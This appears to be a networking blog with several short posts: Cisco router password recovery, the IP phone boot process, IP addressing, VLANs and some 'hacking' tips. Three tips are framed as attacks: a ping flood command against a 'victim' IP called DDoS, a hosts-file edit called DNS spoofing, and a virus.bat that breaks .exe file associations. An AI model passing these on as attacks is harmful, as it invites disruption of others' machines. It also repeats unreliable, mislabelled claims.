Tuesday 27 May 2014

How to break Router's Password

Hi guys this topic is just for the understanding that in a critical condition when we wont be able to log in into our router we can use this method to get into it.

Router has basically 2 register mode
i) 0x2102 (Default mode)
ii) 0x2142 (troubleshoot mode)

Troubleshoot mode is basically the alternative method to dig into the router and this need a physical access with physical access we cant break the password of router.


1. Restart the router(during restart process it goes to default mode and we have to stop it)
2. So in second step we use ctrl+pause/break button to avoid the default register mode.
3. Use command "confreg 0x2142" (this command is used to configure the register mode).
4. It will show the "rommon 2>" mode, here just use reset command.
5. Now the router will restart and open in 0x2142 mode.

It now asks for initial configuration just type NO.

Again use the commands like:

router>show version
router>config t
here we are going to change the register mode
router(config)>config-register 0x2102
router(config)>line console 0
router(config)>no pass(it will not ask for the password)
router>wr(for building configuration)

Now the router have no password.

IP Phone Boot up process

1. IP phone obtains power from the switch
2. Phone loads stored image
3. Switch provides VLAN information to IP phone using CDP.
4. Phone sends DHCP(provides IP address,default gateway and DNS) request;receives IP information and TFTP(option 150) server address.
5. IP Phone gets configuration from TFTP server
6. IP Phone registers with Cisco CallManager server which includes primary,secondary and tertiary servers.

**NOTE: A simple flowchart for the better understanding.

Tuesday 3 January 2012


DNS SPOOFING-DNS stands for Domin Name Services and spoofing means to make people fool
In DNS spoofing for example a person open a browser and type a url like www.google.com in actual situation a person who request for google page can redirect to google.But in DNS SPOOFING that person redirect to another website like www.abc.com
simple steps to do this:
GO to
goto end of host file
Now cmd->nslookup->filehippo.com=this will show the ip of filehippo.com
paste it into host file and write name of any website like www.google.com
Now whenever a person goto his browser and type www.google.com it will automatically redirect to www.filehippo.com
if any kind of problem occurs then flush the dns by the command
cmd->ipconfig/flushdns=it will clear all the saved dns
and also remove all the cookies from the browser.


IP stands for internet protocol
It is a logical address,which is used to uniquely identify a particular system on network.
two types of ip available now
1.ipv4(internet protocol version 4)->it consist of 32bits
2.ipv6(internet protocol version 6)->it consists of 128bits
Now ip address is consist of combination of NETWORK ID and HOST ID
IP addresses are divided into 5 classes
1. class A(0-127)
2. class B(128-191)
3. class C(192-223)
4. class D(224-239)
5. class E(240-255)


DDOS-Stands for Distributed Denial Of Service
Goto run->cmd
type command
ping -l 65000 -n 50000 ip of victim(
it is used to sent many thousands of packets to hang the other system,,to avoid this we can use IDS(Intrusion Detection System) i.e a software installed on pc which detect the unauthorized user.

The Virtual Local Area Network (VLAN)

Short for virtual LAN, a network of computers that behave as if they are connected to the same wire even though they may actually be physically located on different segments of a LAN. VLANs are configured throughsoftware rather than hardware, which makes them extremely flexible. One of the biggest advantages of VLANs is that when a computer is physically moved to another location, it can stay on the same VLAN without any hardware reconfiguration.

How to corrupt all .exe files in xp or win7

Easy steps to corrupt exefiles
1.open notepad
2.write: assoc.exe=hack(or anything)
3.save it with .bat extension,,,like virus.bat
4.double click on that .bat file
5. boom..all the exe files were corrupted
To make it as original
*Just go to that .bat file which a virus
*Right click on it->edit
*Now write:assoc.exe=exefile
*Save it with .bat extension,,,like patch.bat
*Now all the exefiles are working correctly.